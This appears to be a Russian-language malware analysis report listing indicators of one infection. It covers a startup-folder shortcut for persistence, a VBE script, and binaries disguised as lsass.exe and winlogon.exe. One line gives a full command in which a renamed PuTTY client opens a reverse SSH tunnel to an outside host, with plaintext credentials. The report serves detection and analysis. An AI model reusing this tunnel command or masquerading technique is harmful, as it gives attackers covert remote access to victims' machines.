Техническая информация
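- %HOMEPATH%\Start Menu\Programs\Startup\ReaderUpdate.lnk (ярлык в папке автозагрузки пользователя: запускается при каждом входе в систему, то есть служит для закрепления)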
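- 'C:\PefrLogs\lsass.exe' -ssh -R 46481:127.0.0.1:8293 -N suleyman.soxx.us -l suleyman -pw coaiepezacusca (имя системного процесса lsass.exe, но путь не <SYSTEM32>; параметры соответствуют SSH-клиенту семейства PuTTY: -R поднимает обратный туннель с порта 46481 удалённого узла на локальный 127.0.0.1:8293, -N — без запуска оболочки; пароль указан прямо в командной строке и потому попадает в журналы создания процессов)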
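- 'C:\PefrLogs\winlogon.exe' -d -t -l -e0.0.0.0 -i127.0.0.1 -p8293 -a (имя системного процесса winlogon.exe, но путь не <SYSTEM32>; судя по параметрам -i127.0.0.1 -p8293, программа принимает соединения на локальном порту 8293 — на него же направлен туннель из строки с lsass.exe; назначение остальных ключей по этой странице не установить)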
- '<SYSTEM32>\wscript.exe' "C:\PefrLogs\GoogleIndexer.vbe"
- C:\PefrLogs\GoogleIndexer.vbe
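- <LS_APPDATA>\PUTTY.RND (файл случайного зерна, который создают утилиты PuTTY; косвенно указывает на то, что C:\PefrLogs\lsass.exe — переименованный SSH-клиент этого семейства)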
- C:\PefrLogs\lsass.exe
- C:\PefrLogs\ReaderUpdate.lnk
- C:\PefrLogs\winlogon.exe
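- 'su####an.soxx.us':22 (порт 22 — SSH; согласуется с ключом -ssh в командной строке C:\PefrLogs\lsass.exe)
- DNS ASK su####an.soxx.us (DNS-запрос имени, по-видимому, того же узла, что указан в командной строке; часть имени здесь замаскирована символами #)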
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''